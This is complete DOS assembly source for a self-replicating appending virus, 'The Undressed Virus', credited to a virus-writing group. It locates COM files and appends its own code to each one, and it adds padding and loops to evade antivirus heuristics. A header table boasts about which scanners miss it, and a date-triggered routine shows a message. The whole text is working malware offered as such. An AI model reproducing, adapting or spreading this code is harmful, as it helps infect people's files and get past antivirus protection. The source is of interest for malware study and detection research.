; Virus: The Undressed Virus ; Author: Arsonic[Codebreakers] ; Type: Appending ; Encryption: No ; ; Displays a Message on Feb 5th. ; Btw.. I Love Lisa..! ;--------------------------------------------------------------------------------------------------- ; AV-Product | Detected? | Comments ;--------------------------------------------------------------------------------------------------- ; F-Prot | No | Easy to Get Past.. FPROT SUCKS! ; TBAV | Unknown Virus | Well.. at least it aint say VCL! ; AVP | VCL.824 | VCL! ARRGGGHH! ;---------------------------------------------------------------------------------------------------- db 0e9h,0,0 start: call delta delta: pop bp sub bp,offset delta mov cx,0ffffh ;kill heristics fprot_loopy: jmp back mov ax,4c00h int 21h back: loop fprot_loopy mov cx,3 nop mov di,100h nop lea si,[bp+buffer] nop rep movsb find_first: mov ah,4ch add ah,2 nop find_next: nop lea dx,[bp+filemask] nop int 21h jnc infect jmp check_payload infect: mov ax,3d02h mov dx,9eh int 21h xchg ax,bx mov ah,3dh add ah,2 mov cx,3 lea dx,[bp+buffer] int 21h mov ax,word ptr[80h + 1ah] nop sub ax,end - start + 3 nop cmp ax,word ptr[bp+buffer+1] nop je close_file mov ax,word ptr[80h + 1ah] nop sub ax,3 nop mov word ptr[bp+three+1],ax mov ax,4200h xor cx,cx cwd int 21h mov ah,3eh add ah,2 nop lea dx,[bp+three] nop mov cx,3 nop int 21h mov ax,4202h xor cx,cx cwd int 21h mov ah,3eh add ah,2 nop lea dx,[bp+start] nop mov cx,end - start nop int 21h close_file: mov ah,3ch add ah,2 int 21h mov ah,4dh add ah,2 jmp find_next check_payload: mov ah,2ah int 21h cmp dh,2 ;is it febuary? je next jmp close next: cmp dl,5 ;the 5th? je payload ;yes.. display the message jmp close ;no.. return control to the program. payload: mov ah,9h ;display message lea dx,[bp+message] int 21h int 00h ;get keypress int 16h int 20h ;return to dos. close: mov di,100h ;return control to program jmp di three db 0e9h,0,0 filemask db '*.co*',0 ;if *.com it would be detected as trival variant buffer db 0cdh,20h,0 virus db 'The UnDreSSeD',0 ; messages to give those av'ers a author db 'Arsonic[CB]',0 ; nice scan string.. message db 'Happy Birthday Lisa!',10,13,'$' Lisa db 'I LOVE U LISA!',0 end: